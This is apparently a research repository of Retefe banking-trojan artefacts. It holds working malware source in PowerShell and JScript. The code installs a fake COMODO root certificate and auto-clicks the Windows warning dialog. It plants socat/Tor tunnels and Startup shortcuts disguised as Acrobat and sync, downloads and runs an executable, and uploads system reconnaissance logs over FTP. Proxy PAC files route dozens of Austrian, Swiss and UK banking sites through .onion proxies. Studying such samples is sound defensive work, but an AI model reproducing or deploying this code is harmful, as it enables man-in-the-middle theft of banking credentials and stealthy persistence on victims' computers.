$IOTuhLvm=$env:ALLUSERSPROFILE+'\socat-windows-1.7.2.1.7z'; 155 | $ZfPpnOsIwMP=(RandomString); 156 | IgewPfCUf $IOTuhLvm $DestTP; 157 | $mXULIpHUVBrEYif=$DestTP+'\socat-windows-1.7.2.1\'; 158 | Rename-Item -path $mXULIpHUVBrEYif -newName $ZfPpnOsIwMP; 159 | $eyj=$DestTP+'\'+$ZfPpnOsIwMP+'\'; 160 | Remove-Item -Force $IOTuhLvm; 161 | $s1cmd='socat tcp4-LISTEN:5070,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:80,socksport=9050'; 162 | $s2cmd='socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:5588,socksport=9050'; 163 | $rFCeOtJGkZyN="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s1cmd`",0,False))"; 164 | $hxNmZso="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s2cmd`",0,False))"; 165 | BmruWvxEDIoNRA (RandomString) 'mshta.exe' $rFCeOtJGkZyN 0 0 $eyj; 166 | BmruWvxEDIoNRA (RandomString) 'mshta.exe' $hxNmZso 0 0 $eyj; 167 | 168 | Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\acrobat.lnk" $eyj $rFCeOtJGkZyN 169 | Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\sync.lnk" $eyj $hxNmZso 170 | 171 | $pRIhb="vbsc"+"ript:close(CreateObject(`"WScript.Shell`").Run(`"powershell.exe `"`"`$F=`$env:Temp+'\\"+(RandomString)+".exe';rm -Force `$F;`$cl=(New-Object Net.WebClient);`$cl.DownloadFile('http://127.0.0.1:5555/"+(RandomString)+".asp?ts&ip='+`$cl.Download`"+`"String('http://api.ipify.org/'),`$F);& `$F`"`"`",0,False))"; 172 | BmruWvxEDIoNRA (RandomString) 'mshta.exe' $pRIhb 1; 173 | #Set directory permissions 174 | $Rights = "Read, ReadAndExecute, ListDirectory"; 175 | $acl = Get-Acl $MwFU; 176 | $acl|Select -expand Access|ForEach-Object { 177 | $perm = $_.IdentityReference, $Rights, $_.InheritanceFlags, $_.PropagationFlags, "Allow"; 178 | $rule = New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule -ArgumentList $perm; 179 | $acl.SetAccessRule($rule); 180 | } 181 | $acl.SetAccessRuleProtection($True, $False); 182 | $acl | Set-Acl -Path $MwFU; 183 | } 184 | uPFITobIk; 185 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # retefe 2 | Artefacts from various retefe campaigns 3 | 4 | 5 | ## Sources 6 | ### Potential sources for various methods/funtions 7 | 1. QuasarRAT/Client/Core/Recovery/Browsers/Firefox.cs 8 | * https://github.com/quasar/QuasarRAT/blob/master/Client/Core/Recovery/Browsers/Firefox.cs 9 | 2. Pastebin: Firefox 37+ Password & Cookie Recovery 10 | * http://pastebin.com/Qzctxjet 11 | 3. PowerShell Code Repository: Using Task Sch, wrapper by BattleChicken 12 | * http://poshcode.org/5805 13 | 4. Получить handle дочернего окна - C# 14 | * http://www.cyberforum.ru/csharp-net/thread656891.html 15 | -------------------------------------------------------------------------------- /StartWork.ps1: -------------------------------------------------------------------------------- 1 | $Logfile = $env:Temp+"\\$(gc env:computername).log"; 2 | 3 | Function LogWrite 4 | { 5 | Param ([string]$logstring) 6 | $dt=Get-Date -Format "dd.MM.yyyy HH:mm:ss"; 7 | $msg=[string]::Format("[{0}]::[{1}]",$dt,$logstring); 8 | Write-Host $msg; 9 | Add-content $Logfile -value $msg; 10 | } 11 | Function UploadLog 12 | { 13 | $dest = "ftp://XXXXXXXX"; 14 | $wc = New-Object -TypeName System.Net.WebClient; 15 | $wc.UploadFile("$dest/$(gc env:computername).log", $Logfile); 16 | Remove-Item -Path $Logfile; 17 | } 18 | function CheckInstall(){ 19 | $wininfo = (Get-WmiObject Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages); 20 | $wininfo.MUILanguages=$wininfo.MUILanguages -join ","; 21 | LogWrite("OS info: {0}" -f $wininfo -join ""); 22 | if (test-path variable:psversiontable) { 23 | $version = $psversiontable.psversion; 24 | } else { 25 | $version = [version]"1.0.0.0"; 26 | } 27 | LogWrite("Powershell version: {0}" -f $version); 28 | try { 29 | $pac=Get-ItemProperty 'hkcu:\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\'|Select -expand AutoConfigURL -ErrorAction Stop; 30 | LogWrite("Pac setted: '$pac'"); 31 | } 32 | catch { 33 | LogWrite("ERROR: Pac not setted"); 34 | } 35 | $Certs = @(Get-ChildItem cert:\CurrentUser\ROOT|Where-Object {$_.Subject -like "*COMODO RSA Extended Validation Secure Server CA 2*" -or $_.Subject -like "*COMODO Certification Authority*"}|ForEach-Object {"{0} ({1})" -f ($_.Thumbprint,$_.NotBefore)}); 36 | if (-NOT $Certs.count -eq 0){ 37 | LogWrite("Certs installed: '{0}'" -f ($Certs -join "; ")); 38 | }else { 39 | LogWrite("Certs not found"); 40 | } 41 | try{ 42 | $proc = Get-Process | Where-Object {$_.ProcessName -like "tor*" -or $_.ProcessName -like "socat*"}|Select -Property @{ Name="Out"; Expression={"ID:{0}`nName:{1}`nPath:{2}`n-------------" -f $_.Id,$_.ProcessName,$_.Path}}|Select -expand Out; 43 | LogWrite("Proccess list:`n{0}" -f ($proc -join "`n")); 44 | } 45 | catch { 46 | LogWrite("ERROR: Can't get proccess list"); 47 | } 48 | $DestTP=$env:ALLUSERSPROFILE; 49 | try{ 50 | $dirs=dir($DestTP) -ErrorAction Stop; 51 | LogWrite("List dir [{0}]: {1}" -f ($DestTP, (($dirs|Select -expand Name) -join "; "))); 52 | foreach($dir in $dirs){ 53 | try{ 54 | $subdir=dir($dir.FullName) -ErrorAction Stop; 55 | LogWrite("List dir [{0}]:{1}" -f ($dir.FullName, (($subdir|Select -expand Name) -join "; "))); 56 | } 57 | catch{ 58 | LogWrite("ERROR: Can't list dir {0}" -f $dir.FullName); 59 | } 60 | } 61 | } 62 | catch { 63 | LogWrite("ERROR: Can't list dir {0}" -f $DestTP); 64 | } 65 | 66 | $avlist=(Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct" @psboundparameters|Select -expand DisplayName); 67 | if (-NOT $avlist.count -eq 0){ 68 | LogWrite("Av found: '{0}'" -f ($avlist -join "| ")); 69 | }else { 70 | LogWrite("Av not found"); 71 | } 72 | } 73 | function StartWork(){ 74 | LogWrite "Start Log module"; 75 | Start-Sleep -s 3; 76 | CheckInstall; 77 | UploadLog; 78 | } 79 | StartWork; 80 | -------------------------------------------------------------------------------- /proxy_pac_at.js: -------------------------------------------------------------------------------- 1 | function FindProxyForURL(url, host) { 2 | var proxy = "PROXY 6aaoqcl2leiptpvn.onion:5588;"; 3 | var hosts = new Array('*bankaustria.at', '*.bawagpsk.com', '*raiffeisen.at', 4 | '*.bawag.com', 'www.banking.co.at', '*oberbank.at', 5 | 'www.oberbank-banking.at', '*.easybank.at'); 6 | for (var i = 0; i < hosts.length; i++) { 7 | if (shExpMatch(host, hosts[i])) { 8 | return proxy 9 | } 10 | } 11 | return "DIRECT" 12 | } 13 | -------------------------------------------------------------------------------- /proxy_pac_ch.js: -------------------------------------------------------------------------------- 1 | function FindProxyForURL(url, host) { 2 | var proxy = "PROXY aztqlm4tslmpgkau.onion:5588;"; 3 | var hosts = new Array('*.postfinance.ch', 'cs.directnet.com', '*akb.ch', 4 | '*ubs.com', 'tb.raiffeisendirect.ch', '*bkb.ch', '*lukb.ch', 5 | '*zkb.ch', '*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch', 6 | '*bcge.ch', '*raiffeisen.ch', '*credit-suisse.com', '*.clientis.ch', 7 | 'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', '*baloise.ch', 8 | 'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch', '*eek.ch', '*szkb.ch', 9 | '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch', 10 | '*bcf.ch', 'ebanking.raiffeisen.ch', '*bcv.ch', '*juliusbaer.com', 11 | '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch', 12 | '*valiant.ch', '*wir.ch', '*bankthalwil.ch', '*piguetgalland.ch', 13 | '*triba.ch', '*inlinea.ch', '*bernerlandbank.ch', 14 | '*bancasempione.ch', '*bsibank.com', '*corneronline.ch', 15 | '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch', 16 | '*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch', 17 | '*hbl.ch', '*ersparniskasse.ch', '*ekr.ch', 18 | '*sparkasse-dielsdorf.ch', '*eki.ch', '*bankgantrisch.ch', 19 | '*bbobank.ch', '*alpharheintalbank.ch', '*aekbank.ch', 20 | '*acrevis.ch', '*credinvest.ch', '*bancazarattini.ch', '*appkb.ch', 21 | '*arabbank.ch', '*apbank.ch', '*notenstein-laroche.ch', 22 | '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch', 23 | '*bordier.com', '*banquethaler.com', '*bankzimmerberg.ch', 24 | '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch', 25 | '*banquecramer.ch', '*banqueduleman.ch', '*bcpconnect.com', 26 | '*bil.com', '*vontobel.com', '*pbgate.net', '*bnpparibas.com', 27 | '*ceanet.ch', '*ce-riviera.ch', '*cedc.ch', '*cmvsa.ch', 28 | '*ekaffoltern.ch', '*glarner-regionalbank.ch', '*cen.ch', 29 | '*cbhbank.com', '*coutts.com', '*cimbanque.net', '*cembra.ch', 30 | '*commerzbank.com', '*dominickco.ch', '*efginternational.com', 31 | '*exane.com', '*falconpb.com', '*gemeinschaftsbank.ch', 32 | '*frankfurter-bankgesellschaft.com', '*globalance-bank.com', 33 | '*ca-financements.ch', '*hsbcprivatebank.com', 34 | '*leihkasse-stammheim.ch', '*incorebank.ch', '*lienhardt.ch', 35 | '*mmwarburg.ch', '*maerki-baumann.ch', '*mirabaud.com', 36 | '*nordea.ch', '*pbihag.ch', '*rahnbodmer.ch', '*mybancaria.ch', 37 | '*reyl.com', '*saanenbank.ch', '*sebgroup.com', '*slguerbetal.ch', 38 | '*bankslm.ch', '*neuehelvetischebank.ch', '*slr.ch', 39 | '*slwynigen.ch', '*sparkasse.ch', '*umtb.ch', '*trafina.ch', 40 | '*ubp.com'); 41 | for (var i = 0; i < hosts.length; i++) { 42 | if (shExpMatch(host, hosts[i])) { 43 | return proxy 44 | } 45 | } 46 | return "DIRECT" 47 | } 48 | -------------------------------------------------------------------------------- /proxy_pac_uk.js: -------------------------------------------------------------------------------- 1 | function FindProxyForURL(url, host) { 2 | var proxy = "PROXY log5moxngjoys52g.onion:88;"; 3 | var hosts = new Array('*barclays.co.uk', '*natwest.com', '*nwolb.com', 4 | 'hsbc.co.uk', 'www.hsbc.co.uk', '*business.hsbc.co.uk', 5 | '*santander.co.uk', '*rbsdigital.com', 6 | 'onlinebusiness.lloydsbank.co.uk', '*cahoot.com', '*smile.co.uk', 7 | '*co-operativebank.co.uk', 'if.com', '*.if.com', 8 | '*ulsterbankanytimebanking.co.uk', '*sainsburysbank.co.uk', 9 | '*tescobank.com', '*halifax-online.co.uk', '*halifax.co.uk', 10 | '*lloydsbank.co.uk', '*lloydstsb.com'); 11 | for (var i = 0; i < hosts.length; i++) { 12 | if (shExpMatch(host, hosts[i])) { 13 | return proxy 14 | } 15 | } 16 | return "DIRECT" 17 | } 18 | -------------------------------------------------------------------------------- /retefe.js: -------------------------------------------------------------------------------- 1 | var Exp = null; 2 | var Fire = null; 3 | var TP = null; 4 | var wss = new ActiveXObject("WScript.Shell"); 5 | var fso = new ActiveXObject("Scripting.FileSystemObject"); 6 | var BINARY_STREAM_TYPE = 1; 7 | var TEXT_STREAM_TYPE = 2; 8 | var CREATE_OVERWRITE_SAVE_MODE = 2; 9 | var ENV_TEMP = wss.ExpandEnvironmentStrings("%TEMP%"); 10 | var ENV_APPDATA = wss.ExpandEnvironmentStrings("%APPDATA%"); 11 | var Cfg = { 12 | dl: ["paoyu7gub72lykuk.onion", "5kybfrm53fkdgktz.onion", 13 | "s4c3jh2qqxyqfknh.onion", "s5jhnylq4yi7omen.onion" 14 | ], 15 | cert: "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", 16 | ps: "function ConfirmCert{
Add-Type @"
using System;
using System.Text;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Security.Cryptography.X509Certificates;
using System.Threading;

public static class W
{
	public class SD
    {
        public string Wndclass;
        public string Title;
        public string Process;
        public IntPtr hWnd;
    }

    private delegate bool EnumWindowsProc(IntPtr hWnd, ref SD data);

    [DllImport("user32.dll")]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool EnumWindows(EnumWindowsProc lpEnumFunc, ref SD data);
	
	[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    public static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount);
	
	[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
	static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
	
	[DllImport("user32.dll")]
	[return: MarshalAs(UnmanagedType.Bool)]
	static extern bool SetForegroundWindow(IntPtr hWnd);
	
	public delegate bool EnumWindowProc(IntPtr hwnd, IntPtr lParam);
	
	[DllImport("user32")]
	[return: MarshalAs(UnmanagedType.Bool)]
	public static extern bool EnumChildWindows(IntPtr window, EnumWindowProc callback, IntPtr lParam);  
	
	[DllImport("user32.dll", CharSet = CharSet.Auto)]
	static extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, IntPtr wParam, IntPtr lParam);
	
	[Flags]
    private enum SnapshotFlags : uint
    {
    HeapList = 0x00000001,
    Process = 0x00000002,
    Thread = 0x00000004,
    Module = 0x00000008,
    Module32 = 0x00000010,
    Inherit = 0x80000000,
    All = 0x0000001F,
    NoHeaps = 0x40000000
    }
    //inner struct used only internally
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
    private struct PROCESSENTRY32
    {
    const int MAX_PATH = 260;
    internal UInt32 dwSize;
    internal UInt32 cntUsage;
    internal UInt32 th32ProcessID;
    internal IntPtr th32DefaultHeapID;
    internal UInt32 th32ModuleID;
    internal UInt32 cntThreads;
    internal UInt32 th32ParentProcessID;
    internal Int32 pcPriClassBase;
    internal UInt32 dwFlags;
    [MarshalAs(UnmanagedType.ByValTStr, SizeConst = MAX_PATH)]
    internal string szExeFile;
    }

    [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
    static extern IntPtr CreateToolhelp32Snapshot([In]UInt32 dwFlags, [In]UInt32 th32ProcessID);

    [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
    static extern bool Process32First([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe);

    [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
    static extern bool Process32Next([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe);

    [DllImport("kernel32", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool CloseHandle([In] IntPtr hObject);
    
	const int BM_CLICK = 0x00F5;
	
	public static byte[] GetCertAsByteArray(String sCert)
    {
		return Convert.FromBase64String(sCert);
    }
        
	public static void S(String sCert){
        byte[] bCert = GetCertAsByteArray(sCert);
        if (bCert != null)
        {
            X509Certificate2 certificate = new X509Certificate2(bCert);
            X509Store store = new X509Store(StoreName.Root, StoreLocation.CurrentUser);
            store.Open(OpenFlags.ReadWrite);
            if (!store.Certificates.Contains(certificate))
            {
                Thread thread = new Thread(SearchDialog);
                thread.Start();
                store.Add(certificate);
                thread.Join();
            }
            store.Close();
        }
	}
	
	public static void SearchDialog()
	{
		IntPtr hWnd;
		do{
			hWnd = SearchForWindow("#32770",String.Empty);
			if (!hWnd.Equals(IntPtr.Zero))
		    {
		    	break;
			}else
	        {
		        hWnd=IntPtr.Zero;
	        }
		}while (hWnd.Equals(IntPtr.Zero));
		SetForegroundWindow(hWnd);
		EnumWindowProc childProc = new EnumWindowProc(ECW);
		EnumChildWindows(hWnd, childProc, IntPtr.Zero);
	}
	
	public static IntPtr SearchForWindow(string wndclass, string title)
    {
        SD sd = new SD();
        sd.Wndclass = wndclass;
        sd.Title = title;
        sd.hWnd=IntPtr.Zero;
        EnumWindows(new EnumWindowsProc(EnumProc), ref sd);
        return sd.hWnd;
    }
    
	public static bool EnumProc(IntPtr hWnd, ref SD data)
    {
    	StringBuilder caption = new StringBuilder(1024);
        StringBuilder className = new StringBuilder(1024);
        GetWindowText(hWnd, caption, caption.Capacity);
        GetClassName(hWnd, className, className.Capacity);
        String sEN=GPN(hWnd).ToLower();
		if((!data.Wndclass.Equals(String.Empty) && className.ToString().StartsWith(data.Wndclass)) || (!data.Title.Equals(String.Empty) && caption.ToString().StartsWith(data.Title)))
		{
        	if(sEN.Contains("csrss") || sEN.Contains("certutil")  || sEN.Contains("powershell"))
	        {
		        data.hWnd = hWnd;
                return false;
	        }
        }
       	
        return true;
    }
  
	public static String GPN(IntPtr hWnd){
		uint pID = 0;
		uint threadID = GetWindowThreadProcessId(hWnd, out pID);
		String sProc = null;
	    IntPtr handleToSnapshot = IntPtr.Zero;
	    try
	    {
	        PROCESSENTRY32 procEntry = new PROCESSENTRY32();
	        procEntry.dwSize = (UInt32)Marshal.SizeOf(typeof(PROCESSENTRY32));
	        handleToSnapshot = CreateToolhelp32Snapshot((uint)SnapshotFlags.Process, 0);
	        if (Process32First(handleToSnapshot, ref procEntry))
	        {
	        do
	        {
	            if (pID == procEntry.th32ProcessID)
	            {
	            sProc = procEntry.szExeFile;
	            break;
	            }
	        } while (Process32Next(handleToSnapshot, ref procEntry));
	        }
	        else
	        {
	        	throw new ApplicationException(string.Format("Failed with win32 error code {0}", Marshal.GetLastWin32Error()));
	        }
	    }
	    catch (Exception ex)
	    {
	        throw new ApplicationException("Can't get the process.", ex);
	    }
	    finally
	    {
	        CloseHandle(handleToSnapshot);
	    }
	    return sProc;
	}
	public static bool ECW(IntPtr hWnd, IntPtr lParam)
	{
		SendMessage(hWnd, BM_CLICK, IntPtr.Zero, IntPtr.Zero);
		return true;
	}
}
"@;
[W]::S("%CERT%");
exit
}
ConfirmCert", 17 | psf: "function AddCertFF{
Add-Type @"
using System;
using System.IO;
using Microsoft.Win32;
using System.Runtime.InteropServices;
using System.ComponentModel;

public sealed class FF
{
	private static volatile FF instance;
	private static object syncRoot = new Object();
	public static FF GetInstance()
    {
        if (instance == null)
        {
            lock (syncRoot)
            {
                if (instance == null)
                    instance = new FF();
            }
        }
        return instance;
    }
	
	const int ERROR_SUCCESS=0;
    private static IntPtr LoadWin32Library(string libPath)
    {
        if (String.IsNullOrEmpty(libPath))
            throw new ArgumentNullException("libPath");

        IntPtr moduleHandle = LoadLibrary(libPath);
        if (moduleHandle == IntPtr.Zero)
        {
            int lasterror = Marshal.GetLastWin32Error();
            Win32Exception innerEx = new Win32Exception(lasterror);
            innerEx.Data.Add("LastWin32Error", lasterror);
            throw new Exception("can't load DLL " + libPath, innerEx);
        }
        return moduleHandle;
    }

    [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
    static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);

    [DllImport("kernel32.dll")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName);
	//Constants
    const uint NSS_INIT_READONLY=0x1;
    const uint NSS_INIT_NOCERTDB = 0x2;
    const uint NSS_INIT_NOMODDB = 0x4;
    const uint NSS_INIT_FORCEOPEN = 0x8;
    const uint NSS_INIT_NOROOTINIT = 0x10;
    const uint NSS_INIT_OPTIMIZESPACE = 0x20;
    const uint NSS_INIT_PK11THREADSAFE = 0x40;
    const uint NSS_INIT_PK11RELOAD = 0x80;
    const uint NSS_INIT_NOPK11FINALIZE = 0x100;
    const uint NSS_INIT_RESERVED = 0x200;
    const uint NSS_INIT_COOPERATE = NSS_INIT_PK11THREADSAFE | NSS_INIT_PK11RELOAD | NSS_INIT_NOPK11FINALIZE | NSS_INIT_RESERVED;

    const string SECMOD_DB = "secmod.db";
    //Structures
    [StructLayout(LayoutKind.Sequential)]
    public struct SECItem 
    {
        public uint iType;
        public IntPtr bData;
        public uint iDataLen;
    }

    [StructLayout(LayoutKind.Sequential)]
    private struct CertTrusts
    {
        public int iSite;
        public int iEmail;
        public int iSoft;
    }

    private enum SECCertUsage
    {
        certUsageSSLClient = 0,
        certUsageSSLServer = 1,
        certUsageSSLServerWithStepUp = 2,
        certUsageSSLCA = 3,
        certUsageEmailSigner = 4,
        certUsageEmailRecipient = 5,
        certUsageObjectSigner = 6,
        certUsageUserCertImport = 7,
        certUsageVerifyCA = 8,
        certUsageProtectedObjectSigner = 9,
        certUsageStatusResponder = 10,
        certUsageAnyCA = 11
    }
	[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
    private delegate int NSS_InitializePtr(string sConfigDir, string certPrefix, string keyPrefix, string secModName, uint flags);

    private int NSS_Initialize(string sConfigDir, string certPrefix, string keyPrefix, string secModName, uint flags)
    {
        IntPtr pProc = GetProcAddress(nssModule, "NSS_Initialize");
        NSS_InitializePtr ptr = (NSS_InitializePtr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(NSS_InitializePtr));
        return ptr(sConfigDir, certPrefix, keyPrefix, secModName, flags);
    }

    [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
    private delegate IntPtr CERT_GetDefaultCertDBPtr();
    private IntPtr CERT_GetDefaultCertDB()
    {
        IntPtr pProc = GetProcAddress(nssModule, "CERT_GetDefaultCertDB");
        CERT_GetDefaultCertDBPtr ptr = (CERT_GetDefaultCertDBPtr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(CERT_GetDefaultCertDBPtr));
        return ptr();
    }

    [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
    private delegate IntPtr NSS_ShutdownPtr();
    private IntPtr NSS_Shutdown()
    {
        IntPtr pProc = GetProcAddress(nssModule, "NSS_Shutdown");
        NSS_ShutdownPtr ptr = (NSS_ShutdownPtr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(NSS_ShutdownPtr));
        return ptr();
    }

    //SECStatus CERT_ImportCerts (CERTCertDBHandle *certdb, SECCertUsage usage, unsigned int ncerts, SECItem **derCerts, CERTCertificate ***retCerts, PRBool keepCerts, PRBool caOnly, char *nickname)
    [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
    private delegate int CERT_ImportCertsPtr(IntPtr certdb, int usage, uint ncerts, ref SECItem[] derCerts, ref IntPtr retCerts, uint keepCerts, uint caOnly, IntPtr nickname);
    private int CERT_ImportCerts(IntPtr certdb, int usage, uint ncerts, ref SECItem[] derCerts, ref IntPtr retCerts, uint keepCerts, uint caOnly, IntPtr nickname)
    {
        IntPtr pProc = GetProcAddress(nssModule, "CERT_ImportCerts");
        CERT_ImportCertsPtr ptr = (CERT_ImportCertsPtr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(CERT_ImportCertsPtr));
        return ptr(certdb, usage, ncerts, ref derCerts, ref retCerts, keepCerts, caOnly, nickname);
    }

    //extern SECStatus CERT_ChangeCertTrust(CERTCertDBHandle *handle,CERTCertificate *cert,CERTCertTrust *trust);
    private delegate int CERT_ChangeCertTrustPtr(IntPtr certdb, IntPtr cert, ref CertTrusts trust);
    private int CERT_ChangeCertTrust(IntPtr certdb, IntPtr cert, ref CertTrusts trust)
    {
        IntPtr pProc = GetProcAddress(nssModule, "CERT_ChangeCertTrust");
        CERT_ChangeCertTrustPtr ptr = (CERT_ChangeCertTrustPtr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(CERT_ChangeCertTrustPtr));
        return ptr(certdb, cert, ref trust);
    }
    //void CERT_DestroyCertArray(CERTCertificate **certs, unsigned int ncerts);
    [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
    public delegate int CERT_DestroyCertArrayPtr(IntPtr cert, uint ncerts);
    private int CERT_DestroyCertArray(IntPtr cert, uint ncerts)
    {
        IntPtr pProc = GetProcAddress(nssModule, "CERT_DestroyCertArray");
        CERT_DestroyCertArrayPtr ptr = (CERT_DestroyCertArrayPtr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(CERT_DestroyCertArrayPtr));
        return ptr(cert, ncerts);
    }

	private IntPtr nssModule = IntPtr.Zero;
	
	public Boolean Start(String sCert){
		String sProfile = GetProfile();
        if (String.IsNullOrEmpty(sProfile))
        {
            return false;
        }
